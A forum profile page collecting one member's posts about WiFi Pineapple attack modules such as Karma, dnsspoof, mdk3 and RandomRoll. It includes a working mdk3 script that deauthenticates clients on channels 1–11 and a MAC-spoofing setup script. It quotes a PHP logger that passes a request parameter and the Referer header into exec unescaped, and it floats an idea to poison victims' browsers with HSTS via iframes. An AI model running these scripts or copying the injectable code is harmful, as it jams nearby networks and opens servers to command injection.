Jump to content

PineDominator

Dedicated Members
  • Posts

    1,078
  • Joined

  • Last visited

  • Days Won

    18

Posts posted by PineDominator

  1. Hasn't it been discussed that the 32MB cannot be fully used? I could be wrong.

    I got a 64MB ram version a while back and it works fine. Has full use of all 64MB.

    I haven't seen a version above 32MB since then.

  2. Ya, rc.local is what I've done. But didnt it use to stick across reboots?! I don't recall having this issue prior to upgrading to the latest firmware.

    I'm not sure if the UI is working. Someone should verify it is. Also, is there a way to query karma for the mac's its been given for black or white listing?!?

    No it doesn't stick after a reboot and u can't query what is blacked or whitelisted. That is why I made a module for blacklisting.

  3. I dont know why, but sometimes the module doesnt capture the victims. Any hel?

    Not the modules fault but is just how Dnsspoof works. Most devices will save dns queries from the past and thus won't get spoofed

  4. In fact don't use it at all. Unfortunately the power level cannot be set to anything above 20dBm. I've tried configuring the NHA under OpenWRT and Backtrack 5. Same result in both cases, you can't bring the power above 20. I've tried different driver installs. Same issue. Stick with the Alfa AWUS036H. It still works.

    Maybe?

    But u need atheros chipset to use karma on it. Plus n speeds

  5. Just a note about mdk3... I am now testing it and i see that if you deauthenticate e.g channel 10 without using the whitelist option

    aps on channel 11 and 9 will also get deauthenticate. The deauthentication affects channels near the ones that you choose

    EDIT: Is it possible that this is happening beacause the NHA antenna wich mdk3 use is very close to pineapples antenna (the channel 11 ap i was telling you :P ) ??

    Could be that 2.4 ghz wifi networks occupie 3 channels.

  6. Nop, that wont work work. If i try "test test test" the result is "test".

    Hmm if it worked before I don't know what to say?

    Could try and remove the variable and quotes then type in the ssid within the command.

    Maybe something in your ssid is a sed command?

  7. works great! first test reaped 41 victims. well done...and simple.

    Awesome :-)

    The one thing I would like to work on is save what monitor interface was created to a variable, instead of assuming mon0.

    Any thoughts on how to do this. Maybe grep and awk the out put from airmon-ng $1

  8. Nice script petertfm! Kinda puts mine to shame.

    Boba Fett has PM'd me with screenshots of the script running and it is deauthing as it should...

    -Foxtrot

    Thanks. But you're script is still useful because it's killing hostapd and running on the internal wifi.

    When whistle master's button module was working I tied the wps button to the deauth script. Only thing I had to do was because mdk3 had been installed to my usb it needs a sym link to the internal folder location. My mk4 setup script now sym links all opkg packages installed to usb to the internal folder structure.

  9. #!/bin/sh
    
    airmon-ng start $1
    
    ifconfig $1 | awk '/HWaddr/ {print $5}' > /tmp/deauth-whitelist.txt
    
    mdk3 mon0 d -w /tmp/deauth-whitelist.txt -c 1,2,3,4,5,6,7,8,9,10,11 &
    
    sleep 35
    
    killall -9 mdk3
    
    airmon-ng stop mon0
    

    This script is designed to work with an external wifi adapter like the Alfa NHA

    I used this script after connecting my external adapter to a router for internet.

    #!/bin/sh
    
    #Change the Mac address of the usb wifi to something random.
    ifconfig $1 down
    macchanger -A $1
    ifconfig $1 up
    
    
    #WPA2 - Let's assume we're going to connect to a WPA2 network
    wpa_supplicant -B -D nl80211 -i $1 -c /usb/wpa_supplicant.conf
    
    #WEP - Uncomment if you want to conect to a WEP network
    #iwconfig $1 mode managed key your_key_here
    #iwconfig $1 essid "your access point name here"
    
    #OPEN - Uncomment if you want to conect to a WEP network
    #iwconfig $1 essid "your access point name here"
    
    
    #Setup ipforwarding via iptables.
    echo 1 > /proc/sys/net/ipv4/ip_forward
    
    #Reset iptables
    #iptables -F
    #iptables -X
    
    iptables -A FORWARD -o $1 -i br-lan -s 172.16.0.0/24 -m conntrack --ctstate NEW -jACCEPT
    iptables -A FORWARD -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
    iptables -A POSTROUTING -t nat -j MASQUERADE
    
    #Wait for 7 seconds to give enough time for association.
    sleep 7
    
    #Grab an ip via DHCP
    udhcpc -i $1
    
    

    the code above is to connect to a wireless router.

    now you can run the mdk3 script as such

    ./deauth.sh wlan1

    wlan1 is the external wifi adapter already connected to a wireless access point

    the script will add the mac of wlan1 to a whitelist so mdk3 won't deauth it from the internet

    it then runs for 35 seconds, enough time to deauth all channels

    then it kills the process and disables the mon0 interface.

  10. Nothing. I run the script via ssh, the script run, but my imac, pc win 7 or blackberry et desauthenticate.

    Last July I made a setup script for mdk3 on the pineapple. I can dig it up if u you'd like. But I found that some devices would not deauth. Even though it does on others. It may be mdk3 on OpenWRT?

  11. Hi petertfm.Thanks for this infusion..It's geat but....I've found an issue.

    I'm running the latest firmware version (2.7 - MK4) and Randomroll 3.2. After trying it for a few minutes I noticed there is no logs!!

    You use:

    randomrollDir="$( cd "$( dirname "$0" )" && pwd)"
    to get the directory where Randomroll is installed. This is correct but in /usb/modules/randomroll/randomroll/log.php the code is the following:

    <?php$roll = $_GET['roll'];$clientIP = $_SERVER["REMOTE_ADDR"];$clientMAC = exec("cat /proc/net/arp | grep ".$clientIP." | awk '{print $4}'");$clientName = exec("cat /tmp/dhcp.leases | grep '".$clientMAC."' | awk '{ print $4}'");if (file_exists('/usb/infusions/randomroll/logs')) {	exec('echo \''.date("Y-m-d H:i:s").' | '.$clientMAC.' | '.$clientIP.' | '.$clientName.' | '.$roll.' | '.$_SERVER["HTTP_REFERER"].'\' >> /usb/infusions/randomroll/logs/RandomRoll.log');}unset($roll, $clientIP, $clientMAC, $clientName);?>
    The path to /usb/infusions/randomroll/logs (lines 11-12) is hardcoded and this path doesn't exists. I fixed this issue replacing the wrong path /usb/infusions/randomroll/logs with the right path /usb/modules/randomroll/logs.

    Best regards.

    I made the decision to support the latest developments firmware only. Since there is only one repository. 2.7.7 is much better than 2.7 stability reasons

  12. I had an idea a while ago to maybe inject the code that tells a browser that the site there at is HSTS. Basically screwing there browser. The next time they visit that site not on the pineapple they cant;-) could make it worse by speeding up the process by loading many domains/sites within a series of Iframes. Would this be possible?

×
×
  • Create New...